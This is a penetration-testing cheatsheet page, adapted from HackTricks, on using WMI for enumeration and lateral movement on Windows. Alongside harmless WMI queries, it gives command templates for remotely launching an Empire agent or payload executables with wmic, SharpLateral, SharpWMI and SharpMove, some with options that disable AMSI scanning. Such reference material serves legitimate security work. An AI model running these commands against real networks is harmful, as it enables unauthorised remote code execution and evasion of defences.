daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

wmiexec.md (6237B)


      1 ---
      2 title: "WmiExec"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/lateral-movement/wmiexec.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/lateral-movement/wmiexec.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # WmiExec
     14 
     15 ## How It Works Explained
     16 
     17 Processes can be opened on hosts where the username and either password or hash are known through the use of WMI. Commands are executed using WMI by Wmiexec, providing a semi-interactive shell experience.
     18 
     19 **dcomexec.py:** Using different DCOM endpoints, this script offers a semi-interactive shell similar to `wmiexec.py`. The selected `-object` value chooses the endpoint; supported objects include `MMC20.Application`, `ShellWindows`, and `ShellBrowserWindow`, with the latter providing the Shell Browser Window technique highlighted in the original walkthrough.<sup>[[2]](#references)[[3]](#references)</sup>
     20 
     21 ## WMI Fundamentals
     22 
     23 ### Namespace
     24 
     25 Structured in a directory-style hierarchy, WMI's top-level container is \root, under which additional directories, referred to as namespaces, are organized.<sup>[[1]](#references)</sup>
     26 Commands to list namespaces:
     27 
     28 ```bash
     29 # Retrieval of Root namespaces
     30 gwmi -namespace "root" -Class "__Namespace" | Select Name
     31 
     32 # Enumeration of all namespaces (administrator privileges may be required)
     33 Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace
     34 
     35 # Listing of namespaces within "root\cimv2"
     36 Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
     37 ```
     38 
     39 Classes within a namespace can be listed using:
     40 
     41 ```bash
     42 gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
     43 gwmi -Namespace "root/microsoft" -List -Recurse
     44 ```
     45 
     46 ### **Classes**
     47 
     48 Knowing a WMI class name, such as win32_process, and the namespace it resides in is crucial for any WMI operation.
     49 Commands to list classes beginning with `win32`:
     50 
     51 ```bash
     52 Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
     53 gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
     54 ```
     55 
     56 Invocation of a class:
     57 
     58 ```bash
     59 # Defaults to "root/cimv2" when namespace isn't specified
     60 Get-WmiObject -Class win32_share
     61 Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
     62 ```
     63 
     64 ### Methods
     65 
     66 Methods, which are one or more executable functions of WMI classes, can be executed.
     67 
     68 ```bash
     69 # Class loading, method listing, and execution
     70 $c = [wmiclass]"win32_share"
     71 $c.methods
     72 # To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")
     73 ```
     74 
     75 ```bash
     76 # Method listing and invocation
     77 Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
     78 ```
     79 
     80 ## WMI Enumeration
     81 
     82 ### WMI Service Status
     83 
     84 Commands to verify if the WMI service is operational:
     85 
     86 ```bash
     87 # WMI service status check
     88 Get-Service Winmgmt
     89 
     90 # Via CMD
     91 net start | findstr "Instrumentation"
     92 ```
     93 
     94 ### System and Process Information
     95 
     96 Gathering system and process information through WMI:
     97 
     98 ```bash
     99 Get-WmiObject -ClassName win32_operatingsystem | select * | more
    100 Get-WmiObject win32_process | Select Name, Processid
    101 ```
    102 
    103 For attackers, WMI is a potent tool for enumerating sensitive data about systems or domains.<sup>[[1]](#references)</sup>
    104 
    105 ```bash
    106 wmic computerystem list full /format:list
    107 wmic process list /format:list
    108 wmic ntdomain list /format:list
    109 wmic useraccount list /format:list
    110 wmic group list /format:list
    111 wmic sysaccount list /format:list
    112 ```
    113 
    114 Remote querying of WMI for specific information, such as local admins or logged-on users, is feasible with careful command construction.
    115 
    116 ### **Manual Remote WMI Querying**
    117 
    118 Stealthy identification of local admins on a remote machine and logged-on users can be achieved through specific WMI queries. `wmic` also supports reading from a text file to execute commands on multiple nodes simultaneously.<sup>[[1]](#references)</sup>
    119 
    120 To remotely execute a process over WMI, such as deploying an Empire agent, the following command structure is employed, with successful execution indicated by a return value of "0":<sup>[[1]](#references)</sup>
    121 
    122 ```bash
    123 wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
    124 ```
    125 
    126 This process illustrates WMI's capability for remote execution and system enumeration, highlighting its utility for both system administration and penetration testing.
    127 
    128 ## Automatic Tools
    129 
    130 - [**SharpLateral**](https://github.com/mertdas/SharpLateral):
    131 
    132 ```bash
    133 SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
    134 ```
    135 
    136 - [**SharpWMI**](https://github.com/GhostPack/SharpWMI)
    137 
    138 ```bash
    139 SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command=""C:\\temp\\process.exe [args]"" [amsi=disable] [result=true]
    140 # Stealthier execution with VBS
    141 SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
    142 ```
    143 
    144 - [**https://github.com/0xthirteen/SharpMove**](https://github.com/0xthirteen/SharpMove):
    145 
    146 ```bash
    147 SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
    148 SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
    149 SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
    150 ```
    151 
    152 - You could also use **Impacket's `wmiexec`**.
    153 
    154 
    155 ## References
    156 
    157 - [1] [Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM)](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
    158 - [2] [Fortra Impacket – dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py)
    159 - [3] [Beginner's Guide to Impacket Tool Kit, Part 1 – Hacking Articles (Internet Archive)](https://web.archive.org/web/20190822180831/https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)